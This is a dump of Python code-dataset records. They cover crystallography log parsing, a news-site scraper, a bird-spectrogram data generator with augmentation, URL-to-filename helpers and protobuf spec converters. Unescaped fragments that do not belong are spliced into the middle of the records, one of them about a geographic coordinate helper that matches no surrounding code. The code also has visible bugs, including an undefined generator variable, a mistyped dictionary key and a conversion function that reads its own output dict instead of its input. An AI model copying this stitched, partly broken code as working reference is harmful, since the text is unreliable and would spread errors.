open(dir_output+\"/for_sorting.tmp2\", \"a\")\n\t#glob returns a list, so make sure it is not empty before continuing\n\tif len(pFiles) != 0:\n\t\t#dictionary that contains the file name, wedges, max cc12\n\t\tcc12 = {}\n\t\t#dictionary that contains file names of max cc \n\t\tfilesC = {}\n\t\tfor folder in pFiles:\n\t\t\t#items is a list of files in the current folder\n\t\t\titems = os.listdir(folder)\n\t\t\tmaxcc = -1\n\t\t\tfor files in items:\n\t\t\t\tif files.startswith('aimless'):\n\t\t\t\t\twith open(os.path.join(folder, files)) as f:\n\t\t\t\t\t\tcontent = f.read().strip()\n\t\t\t\t\tif 'Mn(I) half-set correlation CC(1/2)' in content:\n\t\t\t\t\t\tstore = content.index('Mn(I) half-set correlation CC(1/2)')\n\t\t\t\t\t\tlast = content.index('Completeness', store)\n\t\t\t\t\t\tnewstr = content[store:last-1]\n\t\t\t\t\t\tlastp = newstr.rfind(')')\n\t\t\t\t\t\tnewstr = newstr[lastp+1:].strip()\n\t\t\t\t\t\tspace = newstr.find(' ')\n\t\t\t\t\t\tcc = float(newstr[:space+1].strip())\n\t\t\t\t\t\tif cc > maxcc:\n\t\t\t\t\t\t\tmaxcc = cc\n\t\t\t\t\t\t\tdot = 
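getData leans on a transformCoords helper imported from MapFunctions. A hypothetical sketch of what such a helper could look like, assuming the source data sits in the Dutch RD New grid (EPSG:28992, plausible for a map of Asten) and the target is WGS84; both CRS codes and the helper name are guesses, not the project's actual code:

from shapely.geometry import Polygon
from shapely.ops import transform
from pyproj import Transformer

# always_xy=True keeps (x, y) axis order on both sides.
_to_wgs84 = Transformer.from_crs("EPSG:28992", "EPSG:4326", always_xy=True)

def transform_coords(poly):
    # shapely applies the transformer to every coordinate of the polygon
    return transform(_to_wgs84.transform, poly)

square_rd = Polygon([(155000, 463000), (156000, 463000),
                     (156000, 464000), (155000, 464000)])
lon, lat = transform_coords(square_rd).exterior.xy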
files.find('.')\n\t\t\t\t\t\t\tunders = files.rfind('_')\n\t\t\t\t\t\t\twedge = int(files[unders+1:dot])\n\t\t\t\t\t\t\twedges.append(wedge)\n\t\t\t\t\t\t\tfilesC[folder] = [wedge, maxcc, files]\n\t\t\t\t\t\t\tcc12[folder]=[wedge, maxcc,files]\n\t\tx = pprint.pformat(cc12)\n\t\toutput.write(x)\n\toutput.close()\n\t##\n\tsortedfile = open(dir_output+\"/data_with_frame_selected.txt\", \"a\")\n\t#contains the files in addition to wedge and maxcc\n\tsorted2 = sorted(filesC.items(), key=lambda x: x[1][1], reverse=True)\n\t#cc12 sorted by cc1/2, then by file number\n\tcc12_sorted = sorted(cc12.items(), key=lambda x: (-x[1][1], x[0][-3:]))\n\n\t#cc12sorted only includes data with cc12 values greater than min cc cutoff\n\tcc12sorted_index=[d for d in range(len(cc12_sorted)) if float(cc12_sorted[d][1][1]) > float(cc_cutoff)]\n\tcc12sorted=[cc12_sorted[e] for e in cc12sorted_index]\n\tout = pprint.pformat(cc12sorted)\n\tsortedfile.write(out)\n\tsortedfile.close()\n\treturn cc12sorted\n\n## write unit_cell.txt and unit_cell.txt2 \ndef createAUC1(dir_output,dataprefix, cc_cutoff):\n\tcwd = os.getcwd()\n\n\tcheck=[dir_output+\"/unit_cell.txt\", dir_output+\"/unit_cell.txt2\",dir_output+\"/check.txt\"]\n\tfor files in check:\n\t\tif os.path.exists(files):\n\t\t\tos.remove(files)\n\t\n\tauc = open(dir_output+\"/unit_cell.txt\", \"a\")\n\taucRed = open(dir_output + \"/unit_cell.txt2\", \"a\")\n\tout = []\n\n\tx=0\n\tcc12sorted = createFs(dir_output,dataprefix, cc_cutoff)\n\tfor items in cc12sorted:\n\t\twith open(cwd +'/' + cc12sorted[x][0] + \"/\" + cc12sorted[x][1][2]) as f:\n\t\t\tcontent = f.read()\n\t\t\tx = x+1\n\t\tif 'Average unit cell' in content:\n\t\t\tstore = content.index('Average unit cell:')\n\t\t\tlast = content.index('Selection',store)\n\t\t\tnewstr = content[store:last-1]\n\t\t\tout.append(newstr[:-5])\n\toutput = pprint.pformat(out)\n\tauc.write(output)\n\tresult = []\n\tfor data in out:\n\t\tnew = data[21:]\n\t\tnew = re.sub(' +', ' ', new)\n\t\tfloats = map(float, new.split(' '))\n\t\tfloats = filter(lambda a: a != 90.0, floats)\n\t\tfloats = filter(lambda a: a != 120.0, floats)\n\t\tnewstr = str(floats)\n\t\tresult.append(newstr)\n\tnumbers = '\\n'.join(result)\n\tnumbers = numbers.replace('[', '')\n\tnumbers = numbers.replace(']', '')\t\n\taucRed.write(numbers)\n\tauc.close()\n\taucRed.close()\n\t### combine unit cell with data\n\tcombined = []\n\tcombine = open(dir_output+\"/check.txt\", \"a\")\n\t#print list(cc12sorted), result\n\tfor d in range(len(cc12sorted)):\n\t\t#print cc12sorted[d]\n\t\tcombined.append([result[d],cc12sorted[d][0], cc12sorted[d][1][1]])\n\t#print combined\n\tcombine.write(pprint.pformat(combined))\n\tcombine.close()\n\n\n## if only one data set, pass through \ndef createAUC2(dir_output):\n\tcwd = os.getcwd()\n\n\tif os.path.exists(dir_output + '/cluster.txt'):\n\t\tos.remove(dir_output + '/cluster.txt')\n\n\tclust = open(dir_output+\"/cluster.txt\", \"a\")\n\tclust.write(\"cluster1q 1\")\n\tclust.close()\n\n\n## write 1-picc for clustering\ndef createPicc(dir_output):\n\tif os.path.exists(dir_output+\"/1-picc.txt\"):\n\t\tos.remove(dir_output+\"/1-picc.txt\")\n\n\t#Create 1-picc.txt file to be used in picc rejection\n\tpicc = open(dir_output+\"/1-picc.txt\", \"a\")\n\twith open(dir_output + \"/aimless.log\") as f:\n\t\tcontent = f.read()\n\t\tcbr = content.rfind(\"correlations by resolution\")\n\t\toverall = content.find(\"Overall\", cbr)\n\t\tzero = content.find(\"0\", overall)\n\t\tequal = content.find(\"=\", overall)\n\t\tnewstr = 
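createFs above walks to the CC(1/2) figure with chained index/rfind/slice calls, which fail silently if the aimless log layout shifts. A hedged regex alternative; treating the first number after the label as the value of interest is an assumption carried over from the slicing logic:

import re

def parse_cc_half(log_text):
    m = re.search(r"Mn\(I\) half-set correlation CC\(1/2\)\s+([-+]?\d*\.?\d+)",
                  log_text)
    return float(m.group(1)) if m else None

sample = "Mn(I) half-set correlation CC(1/2)    0.997  0.912  0.441"
print(parse_cc_half(sample))   # -> 0.997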
content[zero:equal-2]\n\t\tpicc.write(newstr)\n\t\tpicc.close()\n\n##### XTAL REJECTION #####\ndef createExtra(dir_output):\n\tcwd = os.getcwd()\n\n\ttmp = open(dir_output+\"/extra.txt\", \"a\")\n\twith open(cwd + \"/aimless.log\") as f:\n\t\tcontent = f.read()\n\t\tcm = content.find('Cumulative multiplicity')\n\t\tcc = content.find('Correlation coefficients',cm)\n\t\tfdollar = content.find('$$', cm)\n\t\tbatch = content.find('Batch', fdollar)\n\t\tln = content.rfind('$$', cm, cc)\n\t\tnew = content[batch-4:ln]\n\t\ttmp.write(new)\n\t\ttmp.close()\n\ndef createSmr(dir_output):\n\tcwd = os.getcwd()\n\tsmr = open(dir_output+\"/SmRmerge.txt\", \"a\")\n\twith open(dir_output + \"/extra.txt\") as f:\n\t\tln = f.readlines()\n\t\tfor x in ln[1:]:\n\t\t\tx = re.sub(' +', ' ', x)\n\t\t\txnew = x.split(' ')\n\t\t\txnew[15] = str(math.sqrt(float(xnew[15])*float(xnew[15])))\n\t\t\tx = \" \".join(xnew)\n\t\t\tsmr.write(str(x))\n\t\tsmr.close()\n\ndef createBatch(dir_output):\n\tcwd = os.getcwd()\n\tbatch = open(dir_output+\"/batch.txt\", \"a\")\n\twith open(cwd+\"/pointless.log\") as f:\n\t\tln = f.read()\n\t\ts = ln.find(\">*> Summary of test data read in:\")\n\t\te = ln.find(\"===\", s)\n\t\tdegrees = ln.rfind(\"degrees\", s, e)\n\t\tln = ln[s:degrees]\n\t\tx = re.sub(' +', ' ', ln)\t\n\t\tx = x.split('\\n')\n\t\tfor item in x:\n\t\t\tif item.startswith(\" Run number: \"):\n\t\t\t\tstart = item.index(\":\")\n\t\t\t\tc = item.index(\" consists\")\n\t\t\t\tfirst = item[start+2:c]\n\t\t\t\tcob = item.index(\"batches \")\n\t\t\t\tdash = item.index(\"- \")\n\t\t\t\ts = item[cob+8:dash]\n\t\t\t\tl = item[dash+2:]\n\t\t\t\tbatch.write(first+' ')\n\t\t\t\tbatch.write(s)\n\t\t\t\tbatch.write(l+\"\\n\")\n\t\tbatch.close()\n\n## dataset number, smr start and end frame\ndef createTmp3a(dir_output):\n\tcwd = os.getcwd()\n\n\tif os.path.exists(dir_output+\"/tmp3_smr.txt\"):\n\t\tos.remove(dir_output+\"/tmp3_smr.txt\")\n\n\twith open(dir_output+\"/batch.txt\") as f:\n\t\tcontent = f.readlines()\n\t\tse = {}\n\t\tfor element in content:\n\t\t\tfspace = element.find(' ')\n\t\t\tsspace = element.rfind(' ')\n\t\t\tstart = int(element[fspace+1:sspace])\n\t\t\tend = int(element[sspace+1:])\n\t\t\tse[start] = end\n\t\tse = sorted(se.iteritems())\n\n\tsmr = open(dir_output+\"/tmp3_smr.txt\", \"a\")\n\twith open(dir_output+\"/SmRmerge.txt\") as f2:\n\t\tcontent2 = f2.readlines()\n\t\ty=1\n\t\tfor x in range(len(se)):\n\t\t\tstart = se[x][0]\n\t\t\tend = se[x][1]\n\t\t\ttmp = []\n\t\t\tfor ln in content2:\n\t\t\t\tln = re.sub(' +', ' ', ln)\n\t\t\t\tln = ln.split(' ')\n\t\t\t\ttf = int(ln[2])>=start\n\t\t\t\ttf2 = int(ln[2]) <= end\n\t\t\t\tif tf&tf2 == True:\n\t\t\t\t\ttmp.append(float(ln[15]))\n\t\t\tif len(tmp)>0:\n\t\t\t\tavg = sum(tmp)/len(tmp)\n\t\t\t\tsmr.write(str(y) + ' ' + str(avg) + ' ' + str(start) + ' ' +str(end)+'\\n')\n\t\t\t\ty = y+1\n\t\tsmr.close()\n\n## sorted dataset number, smr start and end frame\ndef createTmp3b(dir_output):\n\t#sort SmRmerge numbers and add them to tmp3_smr2.txt\n\tif os.path.exists(dir_output+\"/tmp3_smr2.txt\"):\n\t\tos.remove(dir_output+\"/tmp3_smr2.txt\")\n\n\tsmr = open(dir_output+\"/tmp3_smr2.txt\", \"a\")\n\twith open(dir_output+\"/tmp3_smr.txt\") as f:\n\t\tcontent = f.readlines()\n\t\tcontent2 = []\n\t\tfor ln in content:\n\t\t\tln = re.sub(' +', ' ', ln)\n\t\t\tln = ln.split(' ')\n\t\t\tcontent2.append(ln)\n\t\tresult = sorted(content2, key=lambda x: x[1])\n\t\tfor s in result:\n\t\t\tx = ' '.join(s)\n\t\t\tsmr.write(x)\n\t\tsmr.close()\n\treturn result\n\t\ndef 
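Several helpers above are Python 2 idioms that break on Python 3: dict.iteritems() no longer exists (sorted(se.iteritems()) becomes sorted(se.items())), and map()/filter() return lazy iterators whose str() is "<map object ...>", so unit_cell.txt2 would fill with garbage. A py3-safe version of the unit-cell cleanup:

def clean_unit_cell(line):
    values = [float(v) for v in line.split()]            # eager, unlike map()
    values = [v for v in values if v not in (90.0, 120.0)]
    return ", ".join(str(v) for v in values)

print(clean_unit_cell("57.8 57.8 150.0 90.0 90.0 120.0"))
# -> 57.8, 57.8, 150.0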
createBdecay(dir_output):\n\tif os.path.exists(dir_output+\"/Bdecay.txt\"):\n\t\tos.remove(dir_output+\"/Bdecay.txt\")\n\n\tbd = open(dir_output+\"/Bdecay.txt\", \"a\")\n\twith open(dir_output+\"/aimless.log\") as aim:\n\t\tcontent = aim.read()\n\t\trb = content.find(\"Relative Bfactor\")\n\t\tab = content.find(\"Agreement between batches\")\n\t\tdr = content.rfind(\"$$\", rb, ab)\n\t\tbf = content.find(\" 1\", rb, dr)\n\t\tnew = content[bf:dr]\n\t\tbd.write(new)\n\t\tbd.close()\n\ndef createSmrTmp4(path, xtal_steps, dir_output):\t\n\tcc12sorted = createFs(path, dir_output)\n\tif os.path.exists(dir_output+\"/tmp4.txt\"):\n\t\tos.remove(dir_output+\"/tmp4.txt\")\n\n\tsmr = open(dir_output + \"/smr_included.txt\", \"a\")\n\ttmp4 = open(dir_output+\"/tmp4.txt\", \"a\")\n\twith open(dir_output+\"/tmp3_smr2.txt\") as f:\n\t\ttrackFiles = []\n\t\ttrackFold = []\n\t\tcontent = f.readlines()\n\t\ttotal = len(content)\n\t\tcontent = content[:total-xtal_steps]\n\t\tfor s in content:\n\t\t\tfspace = s.find(' ')\n\t\t\tsmr.write(s[:fspace]+'\\n')\n\t\t\tnumber = int(s[:fspace])-1\n\t\t\ttrackFold.append(str(cc12sorted[number][0]))\n\t\t\ttrackFiles.append(cc12sorted[number][1][2])\n\t\t\ttmp4.write('HKLIN ../' + str(cc12sorted[number][0])+ \"/integrated\" + cc12sorted[number][1][2][7:-4] + \".mtz\" + \"\\n\")\n\t\tsmr.close()\n\t\ttmp4.close()\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":9436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606630648","text":"import urllib\nimport urllib.request\nimport urllib.parse\nimport re\nimport time\n\nurl = 'http://www.itjuzi.com/news'\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n\nlinkre = re.compile('href=\\\"(.+?)')\ntopre = re.compile('(.+?)\\\">')\nbotre = re.compile('\\\">(.+?)')\nf = open(\"E:\\documents\\itjuzi0710.txt\",'a')\nfor i in range(100):\n curl=url+'?page='+str(i)\n req = urllib.request.Request(url=curl, headers=headers)\n response = urllib.request.urlopen(req).read()\n page = response.decode('UTF-8')\n print(\"now processing on page\"+str(i))\n #titlere = re.compile('(.+?)')\n #linkre = re.compile('href=\\\"(.+?)')\n #print(linkre.findall(page))\n #f = open(\"E:\\documents\\guokr1.txt\",'a')\n #f.write('\\n'+linkre.findall(page)[]+url)\n #f.close()\n for x in linkre.findall(page):\n if 'overview'in x:\n f.write('\\n'+topre.findall(x)[-1]+\" \"+botre.findall(x)[-1])\n time.sleep(3)\nf.close()","sub_path":"catch5.py","file_name":"catch5.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310350367","text":"import pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport random\n\nimport numpy as np\nimport cv2\n\nfrom sklearn.utils import shuffle\n# from augmentation import augment\nimport threading\nimport time\n\n# TODO: using cv2.imread to get data\ncurrent_path = os.getcwd()\n# logging.basicConfig(filename='my.log')\n#TODO(11/13):在这里进行数据加强,在之前做数据做数据加强行不通\n\nclass Data_Gener():\n def __init__(self, mode, Img_size, label_path, limit_species=None):\n '''\n :param mode: To choose what kind the model base on ,(family\\genus\\species)\n :param label_path: the file including kinds' info (Family:['af','bf'...],Genus:['ag','bg',...])\n '''\n self.mode = mode\n\n # label_info is a dict that keys is the name of (family\\genus\\species) and the values is digit ID\n self.label_info = 
self._label_info(label_path)\n\n # To limit the species in case to check whether the model get the optimal\n self.limit = limit_species\n if limit_species:\n self.label_info = dict(zip(\n list(self.label_info.keys())[:limit_species],\n range(limit_species)\n ))\n\n self.RANDOM = np.random.RandomState(3)\n self.IM_AUGMENTATION = { # 'type':[probability, value]\n #'roll': [0.3, (0.0, 0.05)],\n 'noise': [0.2, 0.01],\n 'noise_samples': [0.4, 0.1],\n 'brightness': [0.5, (0.25, 1.25)],\n 'crop': [0.4, 0.07],\n # 'flip': [0.2, 1]\n }\n self.IM_SIZE = Img_size # W, H\n\n\n\n def data_gener(self, data_file_path, spec_path, aug):\n '''\n :param data_file_path: a path of pd.DataFrame instance including an item infos:\n e.g. item:{'ClassID':fupfmb,\n 'Family':Thamnophilidae\n 'FileName':LIFECLEF2014_BIRDAMAZON_XC_WAV_RN100.wav\n 'Genus':Hylophylax,\n 'Species':punctulatus}\n :param spec_path: From the data_file we get the FileName and this param get the full path of data\n '''\n\n\n if type(data_file_path) == bytes:\n data_file_path = data_file_path.decode('ascii')\n file = pd.read_csv(data_file_path)\n\n if self.limit:\n file = file[file.Species.isin(self.label_info.keys())]\n data = file\n\n # cause tensorflow will post str in byte mode.\n if type(spec_path) == bytes:\n spec_path = spec_path.decode('ascii')\n data_path = spec_path\n\n # TODO: make a one image and label output file which delete `batch` element\n i = 0\n data = shuffle(data)\n data = data.reset_index(drop=True)\n while i < data.shape[0]:\n # print('New round begining')\n item = data.iloc[i]\n i += 1\n\n # Get the the FileName's directory path\n FileName = item['FileName']\n # TODO:做一个文件夹的说明图(百度搜索目录结构图)\n file_dir = os.path.join(data_path, FileName.split('.')[0])\n\n # TODO(solved, Use data_check.py): Cause some file will not exist, the num of batch will be less than batch_size\n if not os.path.exists(file_dir):\n # cause some audio will be regard as a noise audio\n # And some species just get one or two audios\n # So the file_dir will not exist\n raise FileExistsError('{} dose not exist'.format(file_dir))\n\n img = self._img_get2(file_dir)\n # print(img.shape)\n if img.shape != (self.IM_SIZE[0], self.IM_SIZE[1]):\n print('The error file name is %s' % FileName)\n # LIFECLEF2017_BIRD_XC_WAV_RN49356.wav\n continue\n\n # self._imageAugmentation will do the augmentation job, but there is a probability that img doesn't get aug\n if aug:\n img = self._imageAugmentation(img, probability=0.8)\n\n # Save label\n # The family/genus/species name\n label_name = item['Species']\n #\n label = [0] * len(self.label_info.keys())\n label[int(self.label_info[label_name])] = 1\n\n yield img, label\n\n def data_size(self, filep):\n file = pd.read_csv(filep)\n if self.limit:\n file = file[file.Species.isin(self.label_info.keys())]\n return file.shape[0]\n\n # The function get the img data from provided path\n def _img_get2(self, FileDirPath):\n #print('One Data Loading')\n file_name = random.sample(os.listdir(FileDirPath), 1)[0]\n path = os.path.join(FileDirPath, file_name)\n img = plt.imread(path)\n IM_SIZE = self.IM_SIZE\n if img.shape != (IM_SIZE[0], IM_SIZE[1]):\n # TODO: It may be caused because of different win_len and I forget to resize it\n # The error img shape is (400, 109)\n # The error img shape is (400, 235)\n # print('The error img shape is {}'.format(img.shape))\n print('Occurs error img {}'.format(file_name))\n img = cv2.resize(img, (IM_SIZE[1], IM_SIZE[0]))\n\n # logging.error('The error file path is %s' %file_name)\n # print('The error 
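data_gener builds its one-hot labels by hand with a Python list. An equivalent numpy sketch, assuming label_info maps a class name to its integer id exactly as _label_info produces:

import numpy as np

def one_hot(label_name, label_info):
    vec = np.zeros(len(label_info), dtype=np.float32)
    vec[int(label_info[label_name])] = 1.0
    return vec

print(one_hot("b", {"a": 0, "b": 1, "c": 2}))   # [0. 1. 0.]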
file path is %s' % path)\n #print('One Data Loaded')\n img -= img.min()\n img /= img.max()\n return img*255\n\n def _return_noise(self, listdir=r'G:\\dataset\\BirdClef\\paper_dataset\\spectrum\\noise'):\n RANDOM = self.RANDOM\n lists = os.listdir(listdir)\n file_path = RANDOM.choice(lists)\n return plt.imread(os.path.join(listdir, file_path))\n\n def _imageAugmentation(self, img, count=3, probability=0.7):\n RANDOM = self.RANDOM\n IM_SIZE = self.IM_SIZE\n AUG = self.IM_AUGMENTATION\n\n while (count >0 and len(AUG) > 0):\n if RANDOM.choice([True, False], p=[probability, 1 - probability]):\n # Random Crop (without padding)\n if'crop' in AUG and RANDOM.choice([True, False], p=[AUG['crop'][0], 1 - AUG['crop'][0]]):\n h, w = img.shape[:2]\n cropw = RANDOM.randint(1, int(float(w) * AUG['crop'][1]))\n croph = RANDOM.randint(1, int(float(h) * AUG['crop'][1]))\n img = img[croph:-croph, cropw:-cropw]\n # TODO:注意cv2 resize顺序\n img = cv2.resize(img, (IM_SIZE[1], IM_SIZE[0],))\n\n # Flip - 1 = Horizontal, 0 = Vertical\n elif 'flip' in AUG and RANDOM.choice([True, False], p=[AUG['flip'][0], 1 - AUG['flip'][0]]):\n img = cv2.flip(img, AUG['flip'][1])\n\n # Wrap shift (roll up/down and left/right)\n elif 'roll' in AUG and RANDOM.choice([True, False], p=[AUG['roll'][0], 1 - AUG['roll'][0]]):\n img = np.roll(img, int(img.shape[0] * (RANDOM.uniform(-AUG['roll'][1][1], AUG['roll'][1][1]))), axis=0)\n img = np.roll(img, int(img.shape[1] * (RANDOM.uniform(-AUG['roll'][1][0], AUG['roll'][1][0]))), axis=1)\n\n # substrac/add mean\n elif 'mean' in AUG and RANDOM.choice([True, False], p=[AUG['mean'][0], 1 - AUG['mean'][0]]):\n img += np.mean(img) * AUG['mean'][1]\n\n # gaussian noise\n # TODO:可以增加自己提取的噪声\n elif 'noise' in AUG and RANDOM.choice([True, False], p=[AUG['noise'][0], 1 - AUG['noise'][0]]):\n img += RANDOM.normal(0.0, RANDOM.uniform(0, AUG['noise'][1] ** 0.5), img.shape)\n img = np.clip(img, 0.0, 1.0)\n\n # add noise samples\n elif 'noise_samples' in AUG and RANDOM.choice([True, False], p=[AUG['noise_samples'][0], 1 - AUG['noise_samples'][0]]):\n noise = self._return_noise()\n img += noise*AUG['noise_samples'][1]\n img -= img.min(axis=None)\n img /= img.max(axis=None)\n\n # adjust brightness\n elif 'brightness' in AUG and RANDOM.choice([True, False], p=[AUG['brightness'][0], 1 - AUG['brightness'][0]]):\n img *= RANDOM.uniform(AUG['brightness'][1][0], AUG['brightness'][1][1])\n img = np.clip(img, 0.0, 1.0)\n count -= 1\n # show\n # cv2.imshow(\"AUG\", img)#.reshape(IM_SIZE[1], IM_SIZE[0], IM_DIM))\n # cv2.waitKey(-1)\n\n return img\n\n # In one training time, This function will be called only one time\n def _label_info(self, label_path):\n try:\n df = pd.read_csv(label_path)\n except:\n df = pd.read_excel(label_path)\n label = set(df.Species.tolist())\n label_info = dict(zip(label, range(len(label))))\n return label_info\n\n # Label genor, using one time is enough, return csv file that includes three kinds of label\n\n\nif __name__ == '__main__':\n label_path = r'G:\\dataset\\BirdClef\\vacation\\source.csv'\n mode = 'Species'\n data_file_path2 = r'G:\\dataset\\BirdClef\\vacation\\train_file\\target'\n data_file_path1 = r'G:\\dataset\\BirdClef\\vacation\\train_file\\source\\source_train.csv'\n spec_path = r'G:\\dataset\\BirdClef\\paper_dataset\\spectrum'\n source_gener = Data_Gener(mode=mode, Img_size=[256, 512], label_path=label_path, limit_species=10)\n train_source = source_gener.data_gener(data_file_path=data_file_path1,\n spec_path=spec_path,aug=True)\n next(train_source)\n #train_gen1, train_num1 = 
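The TODO in _imageAugmentation about minding the cv2 resize order is worth pinning down: numpy shapes are (height, width) but cv2.resize takes dsize as (width, height), which is why the code passes (IM_SIZE[1], IM_SIZE[0]). A two-line check:

import numpy as np
import cv2

img = np.zeros((256, 512), dtype=np.float32)   # numpy shape is (H, W)
out = cv2.resize(img, (512, 256))              # dsize argument is (W, H)
assert out.shape == (256, 512)                 # back to (H, W)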
gener.data_gener(data_file_path=data_file_path1, BatchSize=8, label_type='source',\n # spec_path=spec_path, mode=mode, aug=False, use_thread=True)\n #train_gen2, train_num2 = gener.data_gener(data_file_path=data_file_path2, BatchSize=8, label_type='target',\n # spec_path=spec_path, mode=mode, aug=False, use_thread=False)\n num = 0\n start1 = time.time()\n while num < 300:\n #if num % 10000000 == 0:\n # print('The next num is %d'%num)\n _, _ = next(test_source)\n #print('The label {} \\n'.format(np.argmax(labels, axis=1)))\n num += 1\n #print(labels.argmax(axis=1))\n end1 = time.time()\n consume1 = end1 - start1\n\n start2 = time.time()\n while num < 200:\n #if num % 10000000 == 0:\n # print('The next num is %d'%num)\n _, _ = next(train_source)\n #print('The label {} \\n'.format(np.argmax(labels, axis=1)))\n num += 1\n #print(labels.argmax(axis=1))\n end2 = time.time()\n consume2 = end2 - start2\n print('The time that not use safe-thread consume {}'.format(consume1))\n print('The time that use safe-thread consume {}'.format(consume2))\n\n","sub_path":"Preprocessing/generator/generator_for_tf.py","file_name":"generator_for_tf.py","file_ext":"py","file_size_in_byte":11044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"636455847","text":"### Functions for URL to file name conversion ###\n\nimport os\nimport re\nimport time\nimport sys\nfrom urllib import quote_plus\n\n# The .png or .jpg at the end of the file sufix controls \n# the image format of the file. \n# The tomcat servlet expects png.\nimageType = \".png\"\nfileSufix = \"Image\" + imageType\n\ndef queryToPath(queryStr):\n \"\"\"Convert the query string of a URL to a path\"\"\" \n return \"/\".join(map(quote_plus, queryStr.split(\"&\")))\n \ndef urlToFileName(url):\n \"\"\"Convert the URL and query string into a file path.\n The returned string will not start with a slash. \"\"\"\n urlToPathAndQuery = re.compile(r\"^http://([^\\?]*)\\?(.*)\")\n match = urlToPathAndQuery.match(url)\n \n filename = None\n \n if match is not None:\n # query found, try this:\n filename = match.groups()[0] + \"/\" + queryToPath(match.groups()[1])\n else:\n urlregex = re.compile(r\"^http://(.*)$\")\n match = urlregex.match(url)\n if match is not None:\n filename= match.groups()[0]\n else:\n # not sure what it is but it might be a hostname\n filename = url\n \n return filename.replace('%','_') + fileSufix\n \n\ndef fileNameToThumbnailName( filename ):\n return 'thumbnail.' 
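captureUrls.py above imports quote_plus from urllib, which is Python 2; on Python 3 it lives in urllib.parse. The core transformation of queryToPath in py3 form:

from urllib.parse import quote_plus

def query_to_path(query):
    # Each &-separated query parameter becomes one percent-encoded
    # path segment; '=' turns into %3D and spaces into '+'.
    return "/".join(quote_plus(part) for part in query.split("&"))

print(query_to_path("size=big&name=a b"))   # -> size%3Dbig/name%3Da+b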
+ filename\n \n","sub_path":"webImageCapture/captureUrls.py","file_name":"captureUrls.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642042297","text":"import json\nfrom shiva.helpers.timers import timed\n\nfrom shiva.core.communication_objects.specs_pb2 import (\n SpecsProto, ActionSpaceProto, EnvSpecsProto, MultiEnvSpecsProto, LearnerSpecsProto\n)\nfrom shiva.core.communication_objects.configs_pb2 import ConfigProto\nfrom shiva.core.communication_objects.helpers_pb2 import SimpleMessage\nfrom shiva.core.communication_objects.enums_pb2 import ComponentType\n\n@timed\ndef from_dict_2_ConfigProto(configs: dict) -> ConfigProto:\n config_proto = ConfigProto()\n config_proto.data = json.dumps(configs)\n return config_proto\n\ndef from_ConfigProto_2_dict(config_proto: ConfigProto) -> dict:\n config = json.loads(config_proto.data)\n return config\n\n@timed\ndef from_dict_2_ObservationsProto(observations):\n assert \"NotImplemented\"\n\n@timed\ndef from_ObservationsProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_ActionsProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_ActionsProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_TrajectoriesProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_TrajectoriesProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_NewAgentsConfigProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_NewAgentsConfigProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_TrainingMetricsProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_EvolutionMetricProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_EvolutionMetricProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_TrainingMetricsProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_EvolutionConfigProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_EvolutionConfigProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_MultiEnvSpecsProto(menv_specs: dict) -> MultiEnvSpecsProto:\n menv_specs_proto = MultiEnvSpecsProto()\n menv_specs_proto.num_envs = menv_specs['num_envs']\n menv_specs_proto.env_specs.observation_space = menv_specs['env_specs']['observation_space']\n menv_specs_proto.env_specs.action_space.discrete = menv_specs['env_specs']['action_space']['discrete']\n menv_specs_proto.env_specs.action_space.param = menv_specs['env_specs']['action_space']['param]']\n menv_specs_proto.env_specs.action_space.acs_space = menv_specs['env_specs']['action_space']['acs_space']\n menv_specs_proto.env_specs.num_agents = menv_specs['env_specs']['num_agents']\n return menv_specs_proto\n\n@timed\ndef from_MultiEnvSpecsProto_2_dict(menv_specs_proto):\n menv_specs = {}\n menv_specs['num_envs'] = menv_specs.num_envs\n menv_specs['env_specs'] = from_EnvSpecsProto_to_dict(menv_specs.env_specs)\n return menv_specs\n\ndef from_dict_2_ActionSpaceProto(action_space: dict) -> ActionSpaceProto:\n action_space_proto = ActionSpaceProto()\n action_space_proto.discrete = action_space['discrete']\n action_space_proto.param = action_space['param']\n action_space_proto.acs_space = action_space['acs_space']\n return action_space_proto\n\ndef from_ActionSpaceProto_2_dict(action_space_proto: dict) -> dict:\n action_space = {}\n action_space['discrete'] = action_space_proto.discrete\n action_space['param'] = action_space_proto.param\n action_space['acs_space'] = action_space_proto.acs_space\n return 
action_space\n\n@timed\ndef from_dict_2_EnvSpecsProto(env_specs: dict):\n env_specs_proto = EnvSpecsProto()\n env_specs_proto.observation_space = env_specs['observation_space']\n env_specs_proto.action_space.discrete = env_specs['action_space']['discrete']\n env_specs_proto.action_space.param = env_specs['action_space']['param']\n env_specs_proto.action_space.acs_space = env_specs['action_space']['acs_space']\n env_specs_proto.num_agents = env_specs['num_agents']\n return env_specs_proto\n\n@timed\ndef from_EnvSpecsProto_to_dict(env_specs_proto: EnvSpecsProto) -> dict:\n env_specs = {}\n env_specs['observation_space'] = env_specs_proto.observation_space\n env_specs['action_space'] = from_ActionSpaceProto_2_dict(env_specs_proto.action_space)\n env_specs['num_agents'] = env_specs_proto.num_agents\n return env_specs\n\n@timed\ndef from_LearnerSpecsProto_2_dict(learner_specs_proto: LearnerSpecsProto) -> dict:\n learner_specs = {}\n 